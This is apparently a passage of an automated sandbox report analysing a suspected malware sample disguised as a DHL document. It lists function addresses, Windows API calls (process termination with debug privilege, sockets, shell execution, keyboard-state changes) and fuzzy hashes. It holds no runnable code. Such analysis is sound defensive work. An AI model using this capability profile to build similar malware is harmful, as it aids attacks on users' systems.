                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0082E9A4
                                                                                    • GetLastError.KERNEL32 ref: 0082E9B7
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0082E9E6
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0082EA63
                                                                                    • GetLastError.KERNEL32(00000000), ref: 0082EA6E
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0082EAA3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 2533919879-2896544425
                                                                                    • Opcode ID: 9316eb1b3527154bc9df4353d22cbe4483f6b20ee48ad8cd286ca46b6018c686
                                                                                    • Instruction ID: 642f4d9eb8586e6fe6f97f4e4cbc15477ad3a444215c22e4faaae72c86617a3c
                                                                                    • Opcode Fuzzy Hash: 9316eb1b3527154bc9df4353d22cbe4483f6b20ee48ad8cd286ca46b6018c686
                                                                                    • Instruction Fuzzy Hash: 1141A9706002119FDB10EF18DCA5FAEBBA5FF91314F048419FA429B3D2DB74A884CB96
                                                                                    Function 00812F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00813033
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoad
                                                                                    • String ID: blank$info$question$stop$warning
                                                                                    • API String ID: 2457776203-404129466
                                                                                    • Opcode ID: 5fca4ae35150ecc5fb9bebbcf2c645daa18a48c8d38954c1f539a9cf8fd74e33
                                                                                    • Instruction ID: efd4f406e2fc212029326b54f85ddc1972e79fdabe14b849c74b312e2c2e02c6
                                                                                    • Opcode Fuzzy Hash: 5fca4ae35150ecc5fb9bebbcf2c645daa18a48c8d38954c1f539a9cf8fd74e33
                                                                                    • Instruction Fuzzy Hash: 6C11383124878AFED7149B14DC4ACEB6BECFF29320B10002AFA05E6282DB655FC146A0
                                                                                    Function 008142F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00814312
                                                                                    • LoadStringW.USER32(00000000), ref: 00814319
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0081432F
                                                                                    • LoadStringW.USER32(00000000), ref: 00814336
                                                                                    • _wprintf.LIBCMT ref: 0081435C
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0081437A
                                                                                    Strings
                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00814357
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                    • API String ID: 3648134473-3128320259
                                                                                    • Opcode ID: 1559406447a2a57da10b75f829ae9bbd88bbb7a478c012ac81dc0cab56c6c97a
                                                                                    • Instruction ID: c2fe6d75b57965328aace7a7b5b4166386b0897fca40a0a684e620eb3cecd3be
                                                                                    • Opcode Fuzzy Hash: 1559406447a2a57da10b75f829ae9bbd88bbb7a478c012ac81dc0cab56c6c97a
                                                                                    • Instruction Fuzzy Hash: 0B0162F2D00208BFE71197A0DD89EEA776CFB48301F0009A1BB49E2152EA745E854BB1
                                                                                    Function 0083D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0083D47C
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0083D49C
                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0083D6D7
                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0083D6F5
                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0083D716
                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 0083D735
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0083D75A
                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0083D77D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                    • String ID:
                                                                                    • API String ID: 1211466189-0
                                                                                    • Opcode ID: 109cd8e2bd8421cd04dd58ee7916b442a58c00f6928c0a236fdf023c90fa1bf8
                                                                                    • Instruction ID: b4e7840fbc044942ac875afbd6129bb164dfd2e2d8d7da349fb6b3cb9739178c
                                                                                    • Opcode Fuzzy Hash: 109cd8e2bd8421cd04dd58ee7916b442a58c00f6928c0a236fdf023c90fa1bf8
                                                                                    • Instruction Fuzzy Hash: 12B18971A00219AFDF14CF68D9897AD7BB1FF84701F088069ED58DB296E774A990CBD0
                                                                                    Function 007B2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007EC1C7,00000004,00000000,00000000,00000000), ref: 007B2ACF
                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,007EC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 007B2B17
                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,007EC1C7,00000004,00000000,00000000,00000000), ref: 007EC21A
                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007EC1C7,00000004,00000000,00000000,00000000), ref: 007EC286
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1268545403-0
                                                                                    • Opcode ID: a9e583f030f096e09eddf7f215816ecb70b4e60bab2e0744807822e405ef21f4
                                                                                    • Instruction ID: 09526d99ecd62441e83f8b9d63ce0982dbec9ce330313ee837906ef9c265cd5e
                                                                                    • Opcode Fuzzy Hash: a9e583f030f096e09eddf7f215816ecb70b4e60bab2e0744807822e405ef21f4
                                                                                    • Instruction Fuzzy Hash: C5412D316066C0ABC7369B298C8DBEB7B95BB95300F24C81DF54782563C67CA843D751
                                                                                    Function 008170C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 008170DD
                                                                                      • Part of subcall function 007D0DB6: std::exception::exception.LIBCMT ref: 007D0DEC
                                                                                      • Part of subcall function 007D0DB6: __CxxThrowException@8.LIBCMT ref: 007D0E01
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00817114
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00817130
                                                                                    • _memmove.LIBCMT ref: 0081717E
                                                                                    • _memmove.LIBCMT ref: 0081719B
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 008171AA
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008171BF
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 008171DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 256516436-0
                                                                                    • Opcode ID: 2230a32492c89f5ca8c5ffe7b5d46de9259a174773a1e94c591850b509767734
                                                                                    • Instruction ID: 7463708f3296db6c63085ef673dc287d9dd90eb0984f85fe8ea89879180e83cd
                                                                                    • Opcode Fuzzy Hash: 2230a32492c89f5ca8c5ffe7b5d46de9259a174773a1e94c591850b509767734
                                                                                    • Instruction Fuzzy Hash: AC315E71900205EBCB00EFA5DC89AAFBB79FF45710F1441AAE9049B256DB74DE54CBA0
                                                                                    Function 008361D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 008361EB
                                                                                    • GetDC.USER32(00000000), ref: 008361F3
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008361FE
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0083620A
                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00836246
                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00836257
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0083902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00836291
                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008362B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3864802216-0
                                                                                    • Opcode ID: f1113bfa186be38a77e4302f58646d257e2ea51d1e7e7b0ad2e47de3cbb3ca26
                                                                                    • Instruction ID: 7baf69f37036648ca608910f180f27e68a8c6dc749ff57bed47e6517402d070e
                                                                                    • Opcode Fuzzy Hash: f1113bfa186be38a77e4302f58646d257e2ea51d1e7e7b0ad2e47de3cbb3ca26
                                                                                    • Instruction Fuzzy Hash: B5317C72101210BFEB118F14CC8AFAB3BA9FF99761F054065FE08DA292D6B59851CBA0
                                                                                    Function 0080BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 2931989736-0
                                                                                    • Opcode ID: f87058cea6966600073fd5679dabf94029dcc03d0567b15f69a95c58acbc4fc3
                                                                                    • Instruction ID: e574831604a1a3fd6d562d1d629bc8ebb58a22c22c6a2183dc38717c68b6b2b3
                                                                                    • Opcode Fuzzy Hash: f87058cea6966600073fd5679dabf94029dcc03d0567b15f69a95c58acbc4fc3
                                                                                    • Instruction Fuzzy Hash: 1B21CF6160524EBBE24466119D92FBB73ACFF14368F484021FD04D6BC3FB2CDE1182A1
                                                                                    Function 0081EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                      • Part of subcall function 007CFC86: _wcscpy.LIBCMT ref: 007CFCA9
                                                                                    • _wcstok.LIBCMT ref: 0081EC94
                                                                                    • _wcscpy.LIBCMT ref: 0081ED23
                                                                                    • _memset.LIBCMT ref: 0081ED56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                    • String ID: X
                                                                                    • API String ID: 774024439-3081909835
                                                                                    • Opcode ID: 71384f6d8157616e6172db7701297529a56b123644da23775067d63d58e3526f
                                                                                    • Instruction ID: 03e28a293f8b9fcfb0d7f10dcea6524669569eb5a95e1fe3010132126ec52f05
                                                                                    • Opcode Fuzzy Hash: 71384f6d8157616e6172db7701297529a56b123644da23775067d63d58e3526f
                                                                                    • Instruction Fuzzy Hash: BFC14A71608241DFC764EF24C889A9AB7E4FF85314F04492DF999DB2A2DB34EC45CB92
                                                                                    Function 00826B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00826C00
                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00826C21
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00826C34
                                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 00826CEA
                                                                                    • inet_ntoa.WSOCK32(?), ref: 00826CA7
                                                                                      • Part of subcall function 0080A7E9: _strlen.LIBCMT ref: 0080A7F3
                                                                                      • Part of subcall function 0080A7E9: _memmove.LIBCMT ref: 0080A815
                                                                                    • _strlen.LIBCMT ref: 00826D44
                                                                                    • _memmove.LIBCMT ref: 00826DAD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                    • String ID:
                                                                                    • API String ID: 3619996494-0
                                                                                    • Opcode ID: 14aca5c32cb3efa2017e7bcbb460e69625e4435642411d67de803376120959d7
                                                                                    • Instruction ID: 403fe96eab7d0ded04efdbf837d878e8079022f6acc4307918aa4084378cc752
                                                                                    • Opcode Fuzzy Hash: 14aca5c32cb3efa2017e7bcbb460e69625e4435642411d67de803376120959d7
                                                                                    • Instruction Fuzzy Hash: 1781E271204314ABC710EB24DC86FABB7A8FF84714F14491DFA55DB292EA75ED40CB92
                                                                                    Function 007B1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 046abcd4bde7f7c5f476c3fac3509f4d161f01a6599fe4b6b864dbadd46ca3a8
                                                                                    • Instruction ID: e5a733b7beb7f3d261b09afed708e71e13ccc7416b1f6007f5613555339f136c
                                                                                    • Opcode Fuzzy Hash: 046abcd4bde7f7c5f476c3fac3509f4d161f01a6599fe4b6b864dbadd46ca3a8
                                                                                    • Instruction Fuzzy Hash: E4716930900149EFCB15CF98CC98AFFBB79FF89310F948159F915AA251D738AA51CBA0
                                                                                    Function 0083B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindow.USER32(01226D28), ref: 0083B3EB
                                                                                    • IsWindowEnabled.USER32(01226D28), ref: 0083B3F7
                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0083B4DB
                                                                                    • SendMessageW.USER32(01226D28,000000B0,?,?), ref: 0083B512
                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 0083B54F
                                                                                    • GetWindowLongW.USER32(01226D28,000000EC), ref: 0083B571
                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0083B589
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                    • String ID:
                                                                                    • API String ID: 4072528602-0
                                                                                    • Opcode ID: 22e0a4d11bd80c2829df8bf0ca4409d3483358466ef6f5cf425aba7ff638440d
                                                                                    • Instruction ID: df1fa149207ee826b18b818b211fdaeb9fa6e2f638cc3978b866994cef78ed3c
                                                                                    • Opcode Fuzzy Hash: 22e0a4d11bd80c2829df8bf0ca4409d3483358466ef6f5cf425aba7ff638440d
                                                                                    • Instruction Fuzzy Hash: FB71BDB4601204EFDB24DF54C895FBABBA9FF89300F148469EB45D73A2D771A940CB98
                                                                                    Function 0082F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0082F448
                                                                                    • _memset.LIBCMT ref: 0082F511
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0082F556
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                      • Part of subcall function 007CFC86: _wcscpy.LIBCMT ref: 007CFCA9
                                                                                    • GetProcessId.KERNEL32(00000000), ref: 0082F5CD
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0082F5FC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                    • String ID: @
                                                                                    • API String ID: 3522835683-2766056989
                                                                                    • Opcode ID: d9fb01c78ef50201067ef917ffb09c91a83759334e0d72498b3de1c1c936a761
                                                                                    • Instruction ID: 9d28b9da2e9653b309080678e4c2483af58bcbe91c2ba8b69b1d93fea8333307
                                                                                    • Opcode Fuzzy Hash: d9fb01c78ef50201067ef917ffb09c91a83759334e0d72498b3de1c1c936a761
                                                                                    • Instruction Fuzzy Hash: 4761C271A00629DFCB14EF64C885AAEBBF5FF49310F148069EA55AB352CB34AD41CF90
                                                                                    Function 00810F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetParent.USER32(?), ref: 00810F8C
                                                                                    • GetKeyboardState.USER32(?), ref: 00810FA1
                                                                                    • SetKeyboardState.USER32(?), ref: 00811002
                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00811030
                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0081104F
                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00811095
                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008110B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: 1d1588bbd8fb0ca21d64ad6de51614ff575ffc111077354312973a80e09612e7
                                                                                    • Instruction ID: 4e0349014aa2eac80fd01004c3439319036b344f62b5f2c1c08c13a732af8f31
                                                                                    • Opcode Fuzzy Hash: 1d1588bbd8fb0ca21d64ad6de51614ff575ffc111077354312973a80e09612e7
